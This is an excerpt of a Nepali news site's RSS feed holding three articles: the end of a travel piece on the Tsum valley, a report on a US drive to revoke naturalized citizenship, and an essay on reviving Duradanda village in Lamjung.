बौद्ध धर्मका महान योगी मिलारेपा सँग सम्बन्धित गुफा चुम उपत्यकाको अर्को आकर्षण हो । चुम उपत्यकामा पुग्दा पर्यटकहरूले ऐतिहासिक स्थल मात्र होइन, तपस्या, ध्यान र आत्मिक साधनाको कथा पनि अनुभव गर्छन । चुम उपत्यका अहिंसा र करुणाको बौद्ध दर्शनबाट प्रभावित क्षेत्र हो । यहाँको सामाजिक सदभाव, सरल जीवनशैली र आपसी विश्वासले बाहिरी संसारको व्यस्त जीवनबाट आएका पर्यटकलाई आश्चर्य लाग्दछ ।
पर्यटकहरूलाई जानकारी दिन पदमार्गमा सूचना बोर्ड राखिएको छ । यामगाउँ, काशीगाउँ, धार्चे डाँडा, माछाखोला र यारुबगरमा राखिएका बोर्डले पर्यटकीय स्थलको उचाइ, गन्तव्य पुग्न लाग्ने समय, एक ठाउँदेखि अर्को ठाउँसम्मको दूरीलगायत जानकारी दिन्छन । बोर्डमा पदमार्गमा पर्ने खोलानाला, ताल, पुलका साथै ती क्षेत्रमा पाइने वन्यजन्तुबारे पनि जानकारी दिइएको छ । हिमालय क्षेत्रको पदयात्राका क्षणहरु अविस्मरणीय हुन्छन । नयाँ ठाउँमा यात्रा गर्न जति रमाइलो र मनोरम हुन्छ, त्यति नै कठिन पनि हुन्छ । यात्रालाई सहज बनाउन पर्यटकले आफ्नो स्वास्थ्य स्थितिको ख्याल राख्नुपर्छ । गन्तव्यबारे पूर्वजानकारी लिएर मात्र यात्रामा निस्कदा राम्रो हुन्छ । वातावरण तथा मौसम सुहाउँदो लुगा, अत्यावश्यक सामग्री र प्राथमिक उपचारका सामग्रीहरू साथमै राख्नुपर्छ । मोबाइल फोन लिँदा यात्रामा सजिलो हुन्छ । सकेसम्म यस्तो पदयात्रामा एक्लै नगई साथी वा गाइडको साथमा जानुपर्छ ।
कसरी पुग्ने चुम उपत्यका ?
चुमनुब्री उपत्यका गोरखाको आरुघाट र मनाङको धारापानी हुँदै लार्के पास गरेर पनि जान सकिन्छ । मनास्लु क्षेत्र अर्थात चुमनुब्रीमा जाने मुख्य बाटो गोरखाको आरुघाट बजार हो । आरुघाट जान पृथ्वीराजमार्गको बेनीघाटबाट बसमा यात्रा गर्न सकिन्छ । आरुघाट धादिङबेसीबाट समेत मोटरमार्गले जोडिएको छ । पोखराबाट मध्यपहाडी लोकमार्ग हुँदै आउने पर्यटकका लागि पनि सडकले आरुघाट जोडछ । आरुघाटदेखि सोतीखोला, लापुवेसी, माछाखोला हुँदै यात्रा गर्नुपर्छ । अर्को रुट बारपाकबाट लाप्राक हुँदै सिंग्ला निस्किएर माछाखोला पुग्ने पदमार्ग पनि छ । धादिङको फूलखर्क हुँदै गोरखाको केरौंजा, यार्साबाट माछाखोला पुग्ने पदमार्ग पनि पर्यटकले प्रयोग गर्न सक्छन ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49649 0
अमेरिकामा नागरिकता काण्ड : ‘विशेष प्राकृतिककरण खारेज अभियान तीब्र https://www.antaranganews.com/?p=49455 https://www.antaranganews.com/?p=49455#respond Thu, 18 Jun 2026 15:05:07 +0000 https://www.antaranganews.com/?p=49455 एजेन्सी/अमेरिका : अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्प प्रशासनले प्राकृतिककरण (नेचुरलाइजेसन) प्रक्रियामार्फत अमेरिकी नागरिकता प्राप्त गरेका व्यक्तिहरूको नागरिकता खारेज (डिन्याचुरलाइजेसन) गर्ने अभियानलाई तीव्र बनाएको छ । प्रशासनले आगामी अक्टोबरभित्र कम्तीमा २५० वटा डिन्याचुरलाइजेसन मुद्दा दायर गर्ने योजना बनाएको असार ४ गते जनाएको हो ।
यो वर्षको पछिल्लो दुई महिनाभन्दा कम अवधिमै न्याय विभागले २९ वटा मुद्दा दायर गरिसकेको छ । ती सबै मुद्दा विदेशी मूलका अमेरिकी नागरिकविरुद्ध हुन्, जसले अमेरिकी नागरिकता प्राप्त गर्ने क्रममा ठगी वा झूटो विवरण दिएको आरोप लगाइएको समाचारमा जनाइएको छ ।
सन् २००८ देखि १२ जुन २०२६ सम्म १६६ वटा डिन्याचुरलाइजेसन मुद्दा दायर भएका थिए, जसको वार्षिक औसत १० भन्दा कम रहेको अमेरिकी न्याय विभागका एक वरिष्ठ अधिकारीले बताए । उनका अनुसार यसले ट्रम्प प्रशासनले विगतका वर्षहरूको तुलनामा यो अभियान निकै तीव्र बनाएको देखाउँछ । उनले भने, ‘यो कदम ट्रम्पको कडा आप्रवासन नीतिको हिस्सा हो ।’
प्रशासनले अब अवैध रूपमा बसोबास गर्नेहरूलाई मात्र नभई, प्राकृतिककरणमार्फत नागरिकता प्राप्त गरिसकेका व्यक्तिहरूमाथि पनि निगरानी र कानुनी कारबाही बढाएको सरकारी अभिलेख पहुँच तथा विश्लेषण केन्द्रले जनाएको छ । सो केन्द्रका अनुसार न्याय विभागले डिन्याचुरलाइजेसनका मुद्दा अघि बढाउन विभिन्न शाखामा कार्यरत नागरिक मुद्दा हेर्ने वकिलहरूलाई समेत परिचालन गरेको छ । त्यस कार्यका लागि अन्य विभागका वकिल पनि परिचालन गरिएको छ । साथै, अमेरिकी सरकारी वकिल (यूएस अटर्नी) कार्यालयहरूमा पनि थप मुद्दा पठाइँदैछ । ठगी अनुसन्धानमा खटिएका वकिलहरूलाई समेत यस्ता मुद्दामा लगाइएको बताइएको छ ।
एक वरिष्ठ अधिकारीले भने, ‘यो कानुनी व्यवस्था दशकौँदेखि लागू छ । अमेरिकी नागरिकताको विश्वसनीयता जोगाउन र योग्य व्यक्तिले मात्रै नागरिकता पाऊन् भन्ने सुनिश्चित गर्न यस्ता मुद्दालाई प्राथमिकता दिइएको हो ।’
कुन–कुन आधारमा हुन सक्छ नागरिकता खारेज ?
अमेरिकी कानुनअनुसार नागरिकता प्राप्त गर्ने क्रममा महत्वपूर्ण तथ्य लुकाइएको, झूटो विवरण दिइएको वा कानुनी रूपमा नागरिकता प्राप्त गर्ने योग्यता नै नभएको प्रमाणित भएमा संघीय सरकारले नागरिकता खारेज गर्न सक्ने अधिकार राख्छ । यस्ता मुद्दा परिस्थितिअनुसार दिवानी वा फौजदारी दुवै रूपमा अघि बढ्न सक्छन् । यद्यपि, अमेरिकामै जन्मिएका र जन्मसिद्ध नागरिकता प्राप्त गरेका व्यक्तिमा यो प्रक्रिया लागू हुँदैन ।
हालसम्म ट्रम्प प्रशासनले दायर गरेका मुद्दामा नागरिकता प्राप्त गर्ने क्रममा ठगी गरेको, नाबालिगमाथि यौन दुव्र्यवहार गरेको वा प्राकृतिककरणअघि वा त्यसक्रममा आतंकवादप्रति समर्थन जनाएको आरोप लगाइएका व्यक्तिहरू समावेश छन् ।
नेपालीलाई कस्तो प्रभाव पर्ला ?
ट्रम्प सरकारले ल्याएको नागरिकता वा ग्रीनकार्ड नभएका बुबाआमाबाट जन्मिएका सन्तानले जन्मसिद्ध नागरिकता नपाउने प्रावधान अदालतले स्वीकार्दै कार्यान्वयन भएमा यसको प्रभाव नेपालीहरूमा पनि ठूलै पर्ने स्थिति छ ।
ट्रम्प प्रशासनले गत वर्ष कानुनी स्थायी बासिन्दा (नागरिकता वा ग्रीनकार्ड) नभएका बुबाआमाबाट जन्मिएको सन्तानले नागरिकता नपाउने एक कार्यकारी निर्देशिका जारी गर्दै जन्मसिद्ध नागरितासँग सम्बन्धित नयाँ व्यस्था अघि बढाएको थियो ।
अमेरिकाको संविधानको १४ औं संशोधनमा उल्लेख गरिएको ‘अमेरिकाको भूमि वा क्षेत्रभित्र जन्मिएका जो कोहीले अमेरिकी नागरिकता पाउने’ संवैधानिक व्यवस्थालाई उल्ट्याउन ल्याइएको जन्मसिद्ध नागरिकतासँग सम्बन्धित नयाँ निर्णयविरुद्ध अदालतमा चरणबद्ध मुद्दा अघि बढाइएको थियो ।
अब आमा अवैध रूपमा अमेरिकामा बसोबास गरिरहेको अवस्थामा उनले अमेरिकामा जन्माएको बच्चाले अमेरिकी नागरिकता पाउने छैन । त्यसैगरी आमाको अमेरिकी बसाइ वैध भए पनि उनी अस्थायी अनुमतिमा बसिरहेको अवस्थामा जन्मिएको बच्चाले पनि नागरिकता पाउने छैन । बच्चाको जन्म समयमा बाबु अमेरिकी नागरिक वा वैध स्थायी निवासी होइनन् भने पनि बच्चाले अमेरिकी नागरिकता नपाउने बताइएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49455 0
विरासत धान्न चासो र चिन्ता : दुराडाँडाद्वारा चुनौतिको पहिचान र आशाको खोजी https://www.antaranganews.com/?p=49435 https://www.antaranganews.com/?p=49435#respond Thu, 18 Jun 2026 05:05:17 +0000 https://www.antaranganews.com/?p=49435 दुराडाँडा(लमजुङ)– एक जमाना थियो, लमजुङको दुराडाँडाले जिल्लामा अग्रणी स्थान हासिल गरेको थियो । शिक्षा, चेतना, समाजसेवा, कुसंस्कार तथा अर्थिक संकटका विरुद्ध ब्राह्मणद्वारा हलोक्रान्ति आदि कार्य गरेर सम्भावनाको प्रतीक बनेको थियो । तर आज यो थलोको अवस्था ठीक उल्टो देखिन्छ । उजाड झाडीले ढाकिएका बस्ती, भत्कँदै गरेका बाटाघाटा, पानीको अभावले काकाकुल बनेका गाउँ, सुनसान घरहरू, जताततै बाँदरले सताएका बारी र ‘यो घरमा अझै मान्छे बस्छन् कि ?’ भनेर खोज्नुपर्ने अवस्था— यदि यस्ता दृश्यको पर्यायवाची नाम राख्नु प¥यो भने त्यो लमजुङको ऐतिहासिक थलो दुराडाँडा बन्न पुगेको छ यतिबेला ।
विसं २०१०– २० को दशकमा ‘दुराडाँडा केही छैन, टाढा जान्छु म त विद्याको खोजीमा’ भन्ने कविता पंक्तिले पनि दुराडाँडाको वस्तुस्थितिको बोध गर्दथ्यो ।
यतिबेला भने हामीलाई त्यही गाउँका बासिन्दा हामी हौँ भनेर गर्व गर्ने कि लाजले मुख छोप्ने भन्ने प्रश्नले आफैँलाई एकपटक नियाल्न बाध्य बनाउँछ । यो अवस्थाको जिम्मेवारी कसले लिने ? हलो क्रान्तिका नायकहरूले, शिक्षा अभियानका अगुवाहरूले, २०४६ साल पछिका हामी भनिएका नेताहरूले, हामीजस्ता सामान्य नागरिकहरूले, नीति निर्माताहरूले, वा ‘लमजुङमा दुराडाँडा आउट, दुराडाँडा मा ……. आउट’को मानसिकता बोक्नेहरूले ? केही व्यक्तिहरूले पढे, जागिर खाए र बाहिरिए भनेर उनीहरूप्रति रिस पोखेर मात्र गाउँको समस्या समाधान हुँदैन । परिवर्तनको नारा दिनेहरूले पनि समस्याको सम्बोधन गर्न निकास दिन नसकेपछि ‘बाँदरले सतायो, अब कहिले हिँड्ने ?’ भन्ने सोच गाउँ यतिबेलासम्म त्यो विरासत थाम्दै गरेकाहरूको दिल दिमागभर फैलिएको जस्तो देखिन्छ ।
यस्तै यस्तै निराशा, कुण्ठा अनि चिन्ताका बीच आशा र सम्भावनालाई आत्मसात् गर्ने उद्देश्यले २०८३ साल जेठ महिनाको अन्तिम २९ र ३० गते दुराडाँडा सेवा समाज काठमाडौंका केही साथीहरू एक गाडी लिएर दुराडाँडा पुग्यौँ । भ्रमणको सुरुआत सुन्दरबजार नगरपालिकाबाट भयो । नगरपालिकाका मेयर कृष्णप्रसाद कोइरालासहित नगरपालिकाको टोलीसँग विकास, समृद्धि र ‘वेलनेस’ सम्बन्धी विषयमा छलफल गरियो । मेयरबाट सबैका कुरा सुन्ने काम भयो तर आफ्ना कुरा कम खुलाउने व्यक्तित्वका रूपमा परिचित हुनुहुन्छ मेयर भन्ने सुन्दै आएको र त्यसमा पनि दुराडाँडाका विषय उठ्दा टाउको दुख्ने गरेको भन्ने टिप्पणीहरू पनि कहिलेकाहीँ सुनिन्थ्यो ।
यद्यपि दुराडाँडाको विकासमा अवरोध सिर्जना गर्नेहरू केवल बाहिरका मात्र होइनन्, भित्रकै केही मतियारहरू पनि रहेको यथार्थ लुकाउन सकिँदैन । केन्द्रबाट बन्न लागेको सडक आफ्नो प्रभाव क्षेत्रतर्फ तान्ने, फाइलहरू विभिन्न कार्यालयमा अल्झाई राख्ने र स्रोतविहीन योजनामा सीमित पार्ने प्रवृत्तिले दुराडाँडाको विकासमा गम्भीर असर पुर्याएको छ । यस्ता गतिविधिको वास्तविकता कुनै न कुनै दिन अवश्य उजागर हुनेछ ।
यी सबै परिस्थितिका बीच हामीले दुराडाँडाको आस्था, संस्कार, संस्कृति, परम्परा र सम्भावनालाई पुनर्जीवित गर्ने प्रयासस्वरूप कालिका मन्दिरमा नियमित पूजा, महाआरती तथा पूर्णकदको काली मूर्ति स्थापना गर्ने योजना अघि बढायौँ । यससँगै ‘आरोग्य धर्मपथ’ अर्थात् स्वास्थ्य र धर्मलाई जोड्ने अवधारणा माथि विशेष छलफल गरियो । नगर प्रमुखदेखि साविकका छ वटै वडाका अध्यक्षहरूसँग भेट्ने योजना रहे पनि धुसेनी, सिन्दुरे, चन्द्रेश्वर र नेटा वडाका अध्यक्षहरूसँग सार्थक छलफल सम्भव रह्यो ।
पाणिनीका गुरु तथा बटुकहरूको सहयोगमा कालिका, मालिका, वरथुम्की, पुरानकोट देवी, गाउँशहर काली, करापुटार महादेव र तिलनदी महादेव लगायत धार्मिक केन्द्रहरूलाई जोडेर धार्मिक आस्था, आन्तरिक पर्यटन, स्थानीय उत्पादन र होमस्टे प्रवद्र्धनका विषयमा व्यापक छलफल भयो । विद्यालयहरूको अवस्था सुधार, आवश्यक विषय छनोट तथा गुणस्तरीय शिक्षाका सवालहरू पनि उठाइए ।
हामी स्पष्ट थियौँ कि दुराडाँडा सेवा समाज विकासको प्रत्यक्ष कार्यान्वयनकर्ता होइन, सहजकर्ता मात्र हो । स्थानीय नेतृत्व, सरोकारवाला निकाय र राजनीतिक प्रतिनिधिहरूलाई झक्झक्याउने तथा बजेट निर्माणको पूर्वसन्ध्यामा दुराडाँडाका प्राथमिक आवश्यकता र सम्भावनाहरूलाई उजागर गर्ने हाम्रो मुख्य उद्देश्य थियो ।
तुर्लुङका गुठीका पदाधिकारी, क्लबका प्रतिनिधि, आमा समूह, विभिन्न तहमा रहेका दुराडाँडा समाजका प्रतिनिधि तथा स्थानीय बुद्धिजीवीहरूसँग कालिका मन्दिरमा पूर्णकदको काली मूर्ति स्थापना तथा महाआरती कार्यक्रमका विषयमा भएको छलफल अत्यन्त उत्साहजनक र सकारात्मक रह्यो । सबै पक्षले कार्यक्रम सफल बनाउन खुलेर सहयोग गर्ने प्रतिबद्धता व्यक्त गरे ।
कार्यक्रमलाई व्यवस्थित रूपमा अघि बढाउन दुराडाँडा सेवा समाजको संयोजकत्वमा दुरा सेवा समाज, दूरद्रष्टा श्रीकान्त अधिकारी प्रतिष्ठान, कालिका गुठी व्यवस्थापन समिति, कालिका क्लब तथा अन्य सरोकारवालाहरूको सहभागितामा कार्यसमिति गठन गर्ने तथा छ वटै वडाका अध्यक्षहरूको सहभागितामा समन्वय तथा सल्लाह समिति गठन गर्ने निर्णय गरियो ।
यस कार्यक्रममार्फत नगरपालिका तथा सम्बन्धित वडासमक्ष निम्न मागहरू प्रस्तुत गरिएको छ :
१. फेदी– किरिञ्चे– नाल्मा तथा दुराडाँडा– नेटा लिंक सडक स्तरोन्नति र कालोपत्रे गर्ने ।
२. दुराडाँडा क्षेत्रका मठमन्दिरहरूमा नियमित पूजा–आराधनाको व्यवस्था गर्ने ।
३. मालिका र कालिका मन्दिरमा नियमित महाआरती सञ्चालन गर्ने ।
४. ‘आरोग्य धर्मपथ’ अवधारणाअन्तर्गत सुन्दरबजारको च्यानपाटा, मध्यनेपालको नेटा र बेसीशहरको पुरानकोटमा आरोग्य आवास गृह स्थापना गरी व्यवसायिक सञ्चालन गर्ने ।
५. खानेपानी, स्वास्थ्य र शिक्षाको गुणस्तर सुधार गर्ने ।
६. सर्वोदय क्याम्पसका भवनहरूलाई आवासीय तालिम केन्द्रका रूपमा विकास गर्न पहल गर्ने ।
७. ‘ग्रिन दुराडाँडा : स्थानीय उत्पादन, दुराडाँडा जाऔँ– अर्गानिक खाऔँ’ अभियान सञ्चालन गर्ने ।
८. विकासमा ‘भ्यालु चेन’ अवधारणालाई आत्मसात् गरी कृषि, पर्यटन, धार्मिक आस्था, स्थानीय उत्पादन र बजार व्यवस्थापनलाई एकीकृत रूपमा अघि बढाउने । आदि ।
दुराडाँडाको भविष्य केवल सडक वा भवनले मात्र बदलिँदैन । यसको पुनर्जागरणका लागि आस्था, शिक्षा, स्वास्थ्य, कृषि, पर्यटन, स्थानीय उत्पादन र रोजगारीलाई एउटै विकास शृङ्खलामा जोड्न आवश्यक छ । यदि हामीले आफ्नो गाउँलाई केवल सम्झनाको विषय मात्र बनायौँ भने इतिहासले हामीलाई क्षमा गर्ने छैन । तर यदि हामीले साझा प्रयासमार्फत दुराडाँडालाई पुनः जीवन्त बनाउने अभियान सुरु ग¥यौँ भने यही भूमि फेरि शिक्षा, चेतना र सम्भावनाको केन्द्र बनाउन सकिन्छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49435 0